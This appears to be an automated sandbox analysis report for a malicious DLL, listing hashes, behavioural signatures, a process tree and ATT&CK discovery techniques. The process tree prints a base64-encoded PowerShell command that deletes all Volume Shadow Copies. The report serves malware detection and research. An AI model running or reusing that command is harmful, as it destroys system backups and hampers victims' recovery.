Analysis

  • max time kernel
    91s
  • max time network
    155s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220414-en
  • submitted
    24-05-2022 03:35

General

  • Target

    9106117da853d8baa45ff6fdbf1ceada81dd4c2ce896787e445170a8d8c13148.dll

  • Size

    164KB

  • MD5

    f45b3caa097afbdd50358ede4042a88f

  • SHA1

    685757998c553c84433410423daf9d5c9b6068c4

  • SHA256

    9106117da853d8baa45ff6fdbf1ceada81dd4c2ce896787e445170a8d8c13148

  • SHA512

    bf33d5439e01bece4efd21f356fa8619d0dc5dcb72e0c7366c6c3e82f8a909233281633a2cb67e7f92518d6e1dd374961dbfe0a07277a234f33f0bf623620c1f

Score
6/10

Malware Config

Signatures

  • Enumerates connected drives 3 TTPs 24 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 5 IoCs

Processes

  • C:\Windows\system32\rundll32.exe
    rundll32.exe C:\Users\Admin\AppData\Local\Temp\9106117da853d8baa45ff6fdbf1ceada81dd4c2ce896787e445170a8d8c13148.dll,#1
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:5012
    • C:\Windows\SysWOW64\rundll32.exe
      rundll32.exe C:\Users\Admin\AppData\Local\Temp\9106117da853d8baa45ff6fdbf1ceada81dd4c2ce896787e445170a8d8c13148.dll,#1
      2⤵
      • Enumerates connected drives
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:2008
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4740
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:2196

Network

MITRE ATT&CK Matrix ATT&CK v6

Discovery

Query Registry

1
T1012

Peripheral Device Discovery

1
T1120

System Information Discovery

1
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/2008-130-0x0000000000000000-mapping.dmp
  • memory/4740-131-0x0000000000000000-mapping.dmp
  • memory/4740-132-0x000001537A480000-0x000001537A4A2000-memory.dmp
    Filesize

    136KB

  • memory/4740-133-0x00007FF8657A0000-0x00007FF866261000-memory.dmp
    Filesize

    10.8MB